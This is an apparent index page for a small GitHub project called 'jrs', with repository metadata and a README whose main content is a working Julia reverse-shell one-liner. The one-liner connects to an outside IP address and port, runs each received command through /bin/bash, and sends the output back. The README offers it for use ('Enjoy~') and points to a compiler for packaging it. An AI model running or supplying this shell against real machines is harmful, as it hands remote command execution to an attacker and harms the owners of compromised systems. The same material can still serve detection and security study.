https://github.com/potato-industries/jrs
julia reverse shell
https://github.com/potato-industries/jrs
julia julia-language reverse-shell
Last synced: 9 months ago
JSON representation
julia reverse shell
- Host: GitHub
- URL: https://github.com/potato-industries/jrs
- Owner: Potato-Industries
- Created: 2021-12-09T01:17:07.000Z (over 4 years ago)
- Default Branch: main
- Last Pushed: 2021-12-09T01:24:29.000Z (over 4 years ago)
- Last Synced: 2025-01-08T20:35:59.950Z (over 1 year ago)
- Topics: julia, julia-language, reverse-shell
- Language: Julia
- Homepage:
- Size: 2.93 KB
- Stars: 0
- Watchers: 1
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# jrs
julia reverse shell
https://julialang.org/
```
julia --eval 'using Sockets;c = connect("192.168.8.139", 9090);while true;cmd = readline(c, keep=true);try;println(c, read(`/bin/bash -c $cmd`, String));catch e;print(c, e);end;end'
```
**Compile**
https://github.com/JuliaLang/PackageCompiler.jl
Enjoy~